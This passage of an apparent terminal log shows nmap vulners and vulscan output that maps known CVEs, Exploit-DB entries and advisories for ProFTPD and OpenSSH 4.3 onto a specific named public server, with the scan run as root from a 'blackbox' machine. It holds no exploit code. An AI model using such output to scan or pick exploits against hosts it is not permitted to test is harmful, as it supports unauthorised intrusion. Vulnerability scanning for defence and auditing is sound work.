  2041. | [2711] ProFTPD 1.3.0a mod_tls tls_x509_name_oneline memory corruption
  2042. | [2705] ProFTPD 1.3.0 main.c CommandBufferSize denial of service
  2043. |
  2044. | MITRE CVE - https://cve.mitre.org:
  2045. | [CVE-2011-4130] Use-after-free vulnerability in the Response API in ProFTPD before 1.3.3g allows remote authenticated users to execute arbitrary code via vectors involving an error that occurs after an FTP data transfer.
  2046. | [CVE-2011-1137] Integer overflow in the mod_sftp (aka SFTP) module in ProFTPD 1.3.3d and earlier allows remote attackers to cause a denial of service (memory consumption leading to OOM kill) via a malformed SSH message.
  2047. | [CVE-2010-4652] Heap-based buffer overflow in the sql_prepare_where function (contrib/mod_sql.c) in ProFTPD before 1.3.3d, when mod_sql is enabled, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted username containing substitution tags, which are not properly handled during construction of an SQL query.
  2048. | [CVE-2010-4221] Multiple stack-based buffer overflows in the pr_netio_telnet_gets function in netio.c in ProFTPD before 1.3.3c allow remote attackers to execute arbitrary code via vectors involving a TELNET IAC escape character to a (1) FTP or (2) FTPS server.
  2049. | [CVE-2010-3867] Multiple directory traversal vulnerabilities in the mod_site_misc module in ProFTPD before 1.3.3c allow remote authenticated users to create directories, delete directories, create symlinks, and modify file timestamps via directory traversal sequences in a (1) SITE MKDIR, (2) SITE RMDIR, (3) SITE SYMLINK, or (4) SITE UTIME command.
  2050. | [CVE-2009-3639] The mod_tls module in ProFTPD before 1.3.2b, and 1.3.3 before 1.3.3rc2, when the dNSNameRequired TLS option is enabled, does not properly handle a '\0' character in a domain name in the Subject Alternative Name field of an X.509 client certificate, which allows remote attackers to bypass intended client-hostname restrictions via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.
  2051. | [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
  2052. | [CVE-2012-6095] ProFTPD before 1.3.5rc1, when using the UserOwner directive, allows local users to modify the ownership of arbitrary files via a race condition and a symlink attack on the (1) MKD or (2) XMKD commands.
  2053. | [CVE-2009-0543] ProFTPD Server 1.3.1, with NLS support enabled, allows remote attackers to bypass SQL injection protection mechanisms via invalid, encoded multibyte characters, which are not properly handled in (1) mod_sql_mysql and (2) mod_sql_postgres.
  2054. | [CVE-2009-0542] SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%" (percent) character in the username, which introduces a "'" (single quote) character during variable substitution by mod_sql.
  2055. | [CVE-2008-7265] The pr_data_xfer function in ProFTPD before 1.3.2rc3 allows remote authenticated users to cause a denial of service (CPU consumption) via an ABOR command during a data transfer.
  2056. | [CVE-2008-4242] ProFTPD 1.3.1 interprets long commands from an FTP client as multiple commands, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and execute arbitrary FTP commands via a long ftp:// URI that leverages an existing session from the FTP client implementation in a web browser.
  2057. | [CVE-2006-6563] Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute arbitrary code via a large reqarglen length value.
  2058. | [CVE-2006-6171] ** DISPUTED ** ProFTPD 1.3.0a and earlier does not properly set the buffer size limit when CommandBufferSize is specified in the configuration file, which leads to an off-by-two buffer underflow. NOTE: in November 2006, the role of CommandBufferSize was originally associated with CVE-2006-5815, but this was an error stemming from a vague initial disclosure. NOTE: ProFTPD developers dispute this issue, saying that the relevant memory location is overwritten by assignment before further use within the affected function, so this is not a vulnerability.
  2059. | [CVE-2006-6170] Buffer overflow in the tls_x509_name_oneline function in the mod_tls module, as used in ProFTPD 1.3.0a and earlier, and possibly other products, allows remote attackers to execute arbitrary code via a large data length argument, a different vulnerability than CVE-2006-5815.
  2060. | [CVE-2006-5815] Stack-based buffer overflow in the sreplace function in ProFTPD 1.3.0 and earlier allows remote attackers, probably authenticated, to cause a denial of service and execute arbitrary code, as demonstrated by vd_proftpd.pm, a "ProFTPD remote exploit."
  2061. | [CVE-2005-4816] Buffer overflow in mod_radius in ProFTPD before 1.3.0rc2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long password.
  2062. | [CVE-2005-2390] Multiple format string vulnerabilities in ProFTPD before 1.3.0rc2 allow attackers to cause a denial of service or obtain sensitive information via (1) certain inputs to the shutdown message from ftpshut, or (2) the SQLShowInfo mod_sql directive.
  2063. |
  2064. | SecurityFocus - https://www.securityfocus.com/bid/:
  2065. | [50631] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
  2066. |
  2067. | IBM X-Force - https://exchange.xforce.ibmcloud.com:
  2068. | [80980] ProFTPD FTP commands symlink
  2069. | [71226] ProFTPD pool code execution
  2070. | [65207] ProFTPD mod_sftp module denial of service
  2071. | [64495] ProFTPD sql_prepare_where() buffer overflow
  2072. | [63658] ProFTPD FTP server backdoor
  2073. | [63407] mod_sql module for ProFTPD buffer overflow
  2074. | [63155] ProFTPD pr_data_xfer denial of service
  2075. | [62909] ProFTPD mod_site_misc directory traversal
  2076. | [62908] ProFTPD pr_netio_telnet_gets() buffer overflow
  2077. | [53936] ProFTPD mod_tls SSL certificate security bypass
  2078. | [48951] ProFTPD mod_sql username percent SQL injection
  2079. | [48558] ProFTPD NLS support SQL injection protection bypass
  2080. | [45274] ProFTPD URL cross-site request forgery
  2081. | [33733] ProFTPD Auth API security bypass
  2082. | [31461] ProFTPD mod_radius buffer overflow
  2083. | [30906] ProFTPD Controls (mod_ctrls) module buffer overflow
  2084. | [30554] ProFTPD mod_tls module tls_x509_name_oneline() buffer overflow
  2085. | [30147] ProFTPD sreplace() buffer overflow
  2086. | [21530] ProFTPD mod_sql format string attack
  2087. | [21528] ProFTPD shutdown message format string attack
  2088. | [19410] GProFTPD file name format string attack
  2089. | [18453] ProFTPD SITE CHGRP command allows group ownership modification
  2090. | [17724] ProFTPD could allow an attacker to obtain valid accounts
  2091. | [16038] ProFTPD CIDR entry ACL bypass
  2092. | [15387] ProFTPD off-by-one _xlate_ascii_write function buffer overflow
  2093. | [12369] ProFTPD mod_sql SQL injection
  2094. | [12200] ProFTPD ASCII file newline buffer overflow
  2095. | [10932] ProFTPD long PASS command buffer overflow
  2096. | [8332] ProFTPD mod_sqlpw stores passwords in the wtmp log file
  2097. | [7818] ProFTPD ls &quot
  2098. | [7816] ProFTPD file globbing denial of service
  2099. | [7126] ProFTPD fails to resolve hostnames
  2100. | [6433] ProFTPD format string
  2101. | [6209] proFTPD /var symlink
  2102. | [6208] ProFTPD contains configuration error in postinst script when running as root
  2103. | [5801] proftpd memory leak when using SIZE or USER commands
  2104. | [5737] ProFTPD system using mod_sqlpw unauthorized access
  2105. |
  2106. | Exploit-DB - https://www.exploit-db.com:
  2107. | [16878] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
  2108. | [16851] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
  2109. | [15662] ProFTPD 1.3.3c compromised source remote root Trojan
  2110. | [20690] wu-ftpd 2.4/2.5/2.6,Trolltech ftpd 1.2,ProFTPD 1.2,BeroFTPD 1.3.4 FTP glob Expansion Vulnerability
  2111. | [16852] ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
  2112. | [10044] ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)
  2113. | [3730] ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)
  2114. | [3333] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit 2
  2115. | [3330] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit
  2116. | [2928] ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC
  2117. | [2856] ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)
  2118. |
  2119. | OpenVAS (Nessus) - http://www.openvas.org:
  2120. | [103331] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
  2121. | [63497] Debian Security Advisory DSA 1730-1 (proftpd-dfsg)
  2122. |
  2123. | SecurityTracker - https://www.securitytracker.com:
  2124. | [1028040] ProFTPD MKD/XMKD Race Condition Lets Local Users Gain Elevated Privileges
  2125. | [1026321] ProFTPD Use-After-Free Memory Error Lets Remote Authenticated Users Execute Arbitrary Code
  2126. | [1020945] ProFTPD Request Processing Bug Permits Cross-Site Request Forgery Attacks
  2127. | [1017931] ProFTPD Auth API State Error May Let Remote Users Access the System in Certain Cases
  2128. | [1017167] ProFTPD sreplace() Off-by-one Bug Lets Remote Users Execute Arbitrary Code
  2129. | [1012488] ProFTPD SITE CHGRP Command Lets Remote Authenticated Users Modify File/Directory Group Ownership
  2130. | [1011687] ProFTPd Login Timing Differences Disclose Valid User Account Names to Remote Users
  2131. | [1009997] ProFTPD Access Control Bug With CIDR Addresses May Let Remote Authenticated Users Access Files
  2132. | [1009297] ProFTPD _xlate_ascii_write() Off-By-One Buffer Overflows Let Remote Users Execute Arbitrary Code With Root Privileges
  2133. | [1007794] ProFTPD ASCII Mode File Upload Buffer Overflow Lets Certain Remote Users Execute Arbitrary Code
  2134. | [1007020] ProFTPD Input Validation Flaw When Authenticating Against Postgresql Using 'mod_sql' Lets Remote Users Gain Access
  2135. | [1003019] ProFTPD FTP Server May Allow Local Users to Execute Code on the Server
  2136. | [1002354] ProFTPD Reverse DNS Feature Fails to Check Forward-to-Reverse DNS Mappings
  2137. | [1002148] ProFTPD Site and Quote Commands May Allow Remote Users to Execute Arbitrary Commands on the Server
  2138. |
  2139. | OSVDB - http://www.osvdb.org:
  2140. | [89051] ProFTPD Multiple FTP Command Handling Symlink Arbitrary File Overwrite
  2141. | [77004] ProFTPD Use-After-Free Response Pool Allocation List Parsing Remote Memory Corruption
  2142. | [70868] ProFTPD mod_sftp Component SSH Payload DoS
  2143. | [70782] ProFTPD contrib/mod_sql.c sql_prepare_where Function Crafted Username Handling Remote Overflow
  2144. | [69562] ProFTPD on ftp.proftpd.org Compromised Source Packages Trojaned Distribution
  2145. | [69200] ProFTPD pr_data_xfer Function ABOR Command Remote DoS
  2146. | [68988] ProFTPD mod_site_misc Module Multiple Command Traversal Arbitrary File Manipulation
  2147. | [68985] ProFTPD netio.c pr_netio_telnet_gets Function TELNET_IAC Escape Sequence Remote Overflow
  2148. | [59292] ProFTPD mod_tls Module Certificate Authority (CA) subjectAltName Field Null Byte Handling SSL MiTM Weakness
  2149. | [57311] ProFTPD contrib/mod_ratio.c Multiple Unspecified Buffer Handling Issues
  2150. | [57310] ProFTPD Multiple Unspecified Overflows
  2151. | [57309] ProFTPD src/support.c Unspecified Buffer Handling Issue
  2152. | [57308] ProFTPD modules/mod_core.c Multiple Unspecified Overflows
  2153. | [57307] ProFTPD Multiple Modules Unspecified Overflows
  2154. | [57306] ProFTPD contrib/mod_pam.c Multiple Unspecified Buffer Handling Issues
  2155. | [57305] ProFTPD src/main.c Unspecified Overflow
  2156. | [57304] ProFTPD src/log.c Logfile Handling Unspecified Race Condition
  2157. | [57303] ProFTPD modules/mod_auth.c Unspecified Issue
  2158. | [51954] ProFTPD Server NLS Support mod_sql_* Encoded Multibyte Character SQL Injection Protection Bypass
  2159. | [51953] ProFTPD Server mod_sql username % Character Handling SQL Injection
  2160. | [51849] ProFTPD Character Encoding SQL Injection
  2161. | [51720] ProFTPD NLST Command Argument Handling Remote Overflow
  2162. | [51719] ProFTPD MKDIR Command Directory Name Handling Remote Overflow
  2163. | [48411] ProFTPD FTP Command Truncation CSRF
  2164. | [34602] ProFTPD Auth API Multiple Auth Module Authentication Bypass
  2165. | [31509] ProFTPD mod_ctrls Module pr_ctrls_recv_request Function Local Overflow
  2166. | [30719] mod_tls Module for ProFTPD tls_x509_name_oneline Function Remote Overflow
  2167. | [30660] ProFTPD CommandBufferSize Option cmd_loop() Function DoS
  2168. | [30267] ProFTPD src/support.c sreplace() Function Remote Overflow
  2169. | [23063] ProFTPD mod_radius Password Overflow DoS
  2170. | [20212] ProFTPD Host Reverse Resolution Failure ACL Bypass
  2171. | [18271] ProFTPD mod_sql SQLShowInfo Directive Format String
  2172. | [18270] ProFTPD ftpshut Shutdown Message Format String
  2173. | [14012] GProftpd gprostats Utility Log Parser Remote Format String
  2174. | [10769] ProFTPD File Transfer Newline Character Overflow
  2175. | [10768] ProFTPD STAT Command Remote DoS
  2176. | [10758] ProFTPD Login Timing Account Name Enumeration
  2177. | [10173] ProFTPD mod_sqlpw wtmp Authentication Credential Disclosure
  2178. | [9507] PostgreSQL Authentication Module (mod_sql) for ProFTPD USER Name Parameter SQL Injection
  2179. | [9163] ProFTPD MKDIR Directory Creation / Change Remote Overflow (palmetto)
  2180. | [7166] ProFTPD SIZE Command Memory Leak Remote DoS
  2181. | [7165] ProFTPD USER Command Memory Leak DoS
  2182. | [5744] ProFTPD CIDR IP Subnet ACL Bypass
  2183. | [5705] ProFTPD Malformed cwd Command Format String
  2184. | [5638] ProFTPD on Debian Linux postinst Installation Privilege Escalation
  2185. | [4134] ProFTPD in_xlate_ascii_write() Function RETR Command Remote Overflow
  2186. | [144] ProFTPD src/log.c log_xfer() Function Remote Overflow
  2187. |_
  2188. Service Info: OS: Unix
  2189.  
  2190. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2191. Nmap done: 1 IP address (1 host up) scanned in 10.51 seconds
  2192.  
  2193.  
  2194. root@blackbox:/usr/share/nmap/scripts# nmap --script nmap-vulners,vulscan --script-args vulscandb -sV -p22 184.154.192.250
  2195. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:30 CST
  2196. Nmap scan report for server.etours.cn (184.154.192.250)
  2197. Host is up (0.037s latency).
  2198.  
  2199. PORT STATE SERVICE VERSION
  2200. 22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
  2201. | vulners:
  2202. | cpe:/a:openbsd:openssh:4.3:
  2203. | CVE-2006-5051 9.3 https://vulners.com/cve/CVE-2006-5051
  2204. | CVE-2006-4924 7.8 https://vulners.com/cve/CVE-2006-4924
  2205. | CVE-2014-1692 7.5 https://vulners.com/cve/CVE-2014-1692
  2206. | CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
  2207. | CVE-2007-4752 7.5 https://vulners.com/cve/CVE-2007-4752
  2208. | CVE-2009-2904 6.9 https://vulners.com/cve/CVE-2009-2904
  2209. | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
  2210. | CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
  2211. | CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107
  2212. | CVE-2008-4109 5.0 https://vulners.com/cve/CVE-2008-4109
  2213. | CVE-2007-2243 5.0 https://vulners.com/cve/CVE-2007-2243
  2214. | CVE-2006-5052 5.0 https://vulners.com/cve/CVE-2006-5052
  2215. | CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
  2216. | CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814
  2217. | CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000
  2218. | CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327
  2219. |_ CVE-2008-3259 1.2 https://vulners.com/cve/CVE-2008-3259
  2220. | vulscan: VulDB - https://vuldb.com:
  2221. | [44077] OpenBSD OpenSSH up to 4.3 Signal denial of service
  2222. | [39331] OpenSSH 4.3p2 Audit Log linux_audit_record_event unknown vulnerability
  2223. | [43307] OpenSSH 4.0 unknown vulnerability
  2224. | [41835] OpenSSH up to 4.8 unknown vulnerability
  2225. | [38743] OpenSSH up to 4.6 unknown vulnerability
  2226. | [36382] OpenBSD OpenSSH up to 4.6 information disclosure
  2227. | [32699] OpenBSD OpenSSH 4.1 denial of service
  2228. | [2667] OpenBSD OpenSSH 4.4 Separation Monitor unknown vulnerability
  2229. |
  2230. | MITRE CVE - https://cve.mitre.org:
  2231. | [CVE-2009-2904] A certain Red Hat modification to the ChrootDirectory feature in OpenSSH 4.8, as used in sshd in OpenSSH 4.3 in Red Hat Enterprise Linux (RHEL) 5.4 and Fedora 11, allows local users to gain privileges via hard links to setuid programs that use configuration files within the chroot directory, related to requirements for directory ownership.
  2232. | [CVE-2008-4109] A certain Debian patch for OpenSSH before 4.3p2-9etch3 on etch
  2233. | [CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to hijack forwarded X connections by causing ssh to set DISPLAY to :10, even when another process is listening on the associated port, as demonstrated by opening TCP port 6010 (IPv4) and sniffing a cookie sent by Emacs.
  2234. | [CVE-2007-3102] Unspecified vulnerability in the linux_audit_record_event function in OpenSSH 4.3p2, as used on Fedora Core 6 and possibly other systems, allows remote attackers to write arbitrary characters to an audit log via a crafted username. NOTE: some of these details are obtained from third party information.
  2235. | [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
  2236. | [CVE-2008-3844] Certain Red Hat Enterprise Linux (RHEL) 4 and 5 packages for OpenSSH, as signed in August 2008 using a legitimate Red Hat GPG key, contain an externally introduced modification (Trojan Horse) that allows the package authors to have an unknown impact. NOTE: since the malicious packages were not distributed from any official Red Hat sources, the scope of this issue is restricted to users who may have obtained these packages through unofficial distribution points. As of 20080827, no unofficial distributions of this software are known.
  2237. | [CVE-2008-3234] sshd in OpenSSH 4 on Debian GNU/Linux, and the 20070303 OpenSSH snapshot, allows remote authenticated users to obtain access to arbitrary SELinux roles by appending a :/ (colon slash) sequence, followed by the role name, to the username.
  2238. | [CVE-2008-1657] OpenSSH 4.4 up to versions before 4.9 allows remote authenticated users to bypass the sshd_config ForceCommand directive by modifying the .ssh/rc session file.
  2239. | [CVE-2007-6415] scponly 4.6 and earlier allows remote authenticated users to bypass intended restrictions and execute arbitrary code by invoking scp, as implemented by OpenSSH, with the -F and -o options.
  2240. | [CVE-2007-4752] ssh in OpenSSH before 4.7 does not properly handle when an untrusted cookie cannot be created and uses a trusted X11 cookie instead, which allows attackers to violate intended policy and gain privileges by causing an X client to be treated as trusted.
  2241. | [CVE-2007-2243] OpenSSH 4.6 and earlier, when ChallengeResponseAuthentication is enabled, allows remote attackers to determine the existence of user accounts by attempting to authenticate via S/KEY, which displays a different response if the user account exists, a similar issue to CVE-2001-1483.
  2242. | [CVE-2006-5794] Unspecified vulnerability in the sshd Privilege Separation Monitor in OpenSSH before 4.5 causes weaker verification that authentication has been successful, which might allow attackers to bypass authentication. NOTE: as of 20061108, it is believed that this issue is only exploitable by leveraging vulnerabilities in the unprivileged process, which are not known to exist.
  2243. | [CVE-2006-5229] OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions, and possibly under limited configurations, allows remote attackers to determine valid usernames via timing discrepancies in which responses take longer for valid usernames than invalid ones, as demonstrated by sshtime. NOTE: as of 20061014, it appears that this issue is dependent on the use of manually-set passwords that causes delays when processing /etc/shadow due to an increased number of rounds.
  2244. | [CVE-2006-5052] Unspecified vulnerability in portable OpenSSH before 4.4, when running on some platforms, allows remote attackers to determine the validity of usernames via unknown vectors involving a GSSAPI "authentication abort."
  2245. | [CVE-2006-5051] Signal handler race condition in OpenSSH before 4.4 allows remote attackers to cause a denial of service (crash), and possibly execute arbitrary code if GSSAPI authentication is enabled, via unspecified vectors that lead to a double-free.
  2246. | [CVE-2006-4924] sshd in OpenSSH before 4.4, when using the version 1 SSH protocol, allows remote attackers to cause a denial of service (CPU consumption) via an SSH packet that contains duplicate blocks, which is not properly handled by the CRC compensation attack detector.
  2247. | [CVE-2006-0225] scp in OpenSSH 4.2p1 allows attackers to execute arbitrary commands via filenames that contain shell metacharacters or spaces, which are expanded twice.
  2248. | [CVE-2005-2798] sshd in OpenSSH before 4.2, when GSSAPIDelegateCredentials is enabled, allows GSSAPI credentials to be delegated to clients who log in using non-GSSAPI methods, which could cause those credentials to be exposed to untrusted users or hosts.
  2249. | [CVE-2005-2797] OpenSSH 4.0, and other versions before 4.2, does not properly handle dynamic port forwarding ("-D" option) when a listen address is not provided, which may cause OpenSSH to enable the GatewayPorts functionality.
  2250. | [CVE-2005-2666] SSH, as implemented in OpenSSH before 4.0 and possibly other implementations, stores hostnames, IP addresses, and keys in plaintext in the known_hosts file, which makes it easier for an attacker that has compromised an SSH user's account to generate a list of additional targets that are more likely to have the same password or key.
  2251. | [CVE-2001-1029] libutil in OpenSSH on FreeBSD 4.4 and earlier does not drop privileges before verifying the capabilities for reading the copyright and welcome files, which allows local users to bypass the capabilities checks and read arbitrary files by specifying alternate copyright or welcome files.
  2252. |
  2253. | SecurityFocus - https://www.securityfocus.com/bid/:
  2254. | [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
  2255. |
  2256. | IBM X-Force - https://exchange.xforce.ibmcloud.com:
  2257. | [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
  2258. |
  2259. | Exploit-DB - https://www.exploit-db.com:
  2260. | [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
  2261. | [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
  2262. | [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
  2263. |
  2264. | OpenVAS (Nessus) - http://www.openvas.org:
  2265. | [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
  2266. | [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
  2267. | [881183] CentOS Update for openssh CESA-2012:0884 centos6
  2268. | [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
  2269. | [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
  2270. | [870763] RedHat Update for openssh RHSA-2012:0884-04
  2271. | [870129] RedHat Update for openssh RHSA-2008:0855-01
  2272. | [861813] Fedora Update for openssh FEDORA-2010-5429
  2273. | [861319] Fedora Update for openssh FEDORA-2007-395
  2274. | [861170] Fedora Update for openssh FEDORA-2007-394
  2275. | [861012] Fedora Update for openssh FEDORA-2007-715
  2276. | [840345] Ubuntu Update for openssh vulnerability USN-597-1
  2277. | [840300] Ubuntu Update for openssh update USN-612-5
  2278. | [840271] Ubuntu Update for openssh vulnerability USN-612-2
  2279. | [840268] Ubuntu Update for openssh update USN-612-7
  2280. | [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
  2281. | [840214] Ubuntu Update for openssh vulnerability USN-566-1
  2282. | [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
  2283. | [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
  2284. | [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
  2285. | [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
  2286. | [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
  2287. | [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
  2288. | [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
  2289. | [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
  2290. | [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
  2291. | [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
  2292. | [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
  2293. | [100584] OpenSSH X Connections Session Hijacking Vulnerability
  2294. | [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
  2295. | [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
  2296. | [65987] SLES10: Security update for OpenSSH
  2297. | [65819] SLES10: Security update for OpenSSH
  2298. | [65514] SLES9: Security update for OpenSSH
  2299. | [65513] SLES9: Security update for OpenSSH
  2300. | [65334] SLES9: Security update for OpenSSH
  2301. | [65248] SLES9: Security update for OpenSSH
  2302. | [65218] SLES9: Security update for OpenSSH
  2303. | [65169] SLES9: Security update for openssh,openssh-askpass
  2304. | [65126] SLES9: Security update for OpenSSH
  2305. | [65019] SLES9: Security update for OpenSSH
  2306. | [65015] SLES9: Security update for OpenSSH
  2307. | [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
  2308. | [61639] Debian Security Advisory DSA 1638-1 (openssh)
  2309. | [61030] Debian Security Advisory DSA 1576-2 (openssh)
  2310. | [61029] Debian Security Advisory DSA 1576-1 (openssh)
  2311. | [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
  2312. | [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
  2313. | [60667] Slackware Advisory SSA:2008-095-01 openssh
  2314. | [59014] Slackware Advisory SSA:2007-255-01 openssh
  2315. | [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
  2316. | [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
  2317. | [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
  2318. | [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
  2319. | [57492] Slackware Advisory SSA:2006-272-02 openssh
  2320. | [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
  2321. | [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
  2322. | [57470] FreeBSD Ports: openssh
  2323. | [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
  2324. | [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
  2325. | [56294] Slackware Advisory SSA:2006-045-06 openssh
  2326. | [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
  2327. | [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
  2328. | [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
  2329. | [53788] Debian Security Advisory DSA 025-1 (openssh)
  2330. | [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
  2331. | [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
  2332. | [11343] OpenSSH Client Unauthorized Remote Forwarding
  2333. | [10954] OpenSSH AFS/Kerberos ticket/token passing
  2334. | [10883] OpenSSH Channel Code Off by 1
  2335. | [10823] OpenSSH UseLogin Environment Variables
  2336. |
  2337. | SecurityTracker - https://www.securitytracker.com:
  2338. | [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
  2339. | [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
  2340. | [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
  2341. | [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
  2342. | [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
  2343. | [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
  2344. | [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
  2345. | [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
  2346. | [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
  2347. | [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
  2348. | [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
  2349. | [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
  2350. | [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
  2351. | [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
  2352. | [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
  2353. | [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
  2354. | [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
  2355. | [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
  2356. | [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
  2357. | [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
  2358. | [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
  2359. | [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
  2360. | [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
  2361. | [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
  2362. | [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
  2363. | [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
  2364. | [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
  2365. | [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
  2366. | [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
  2367. | [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
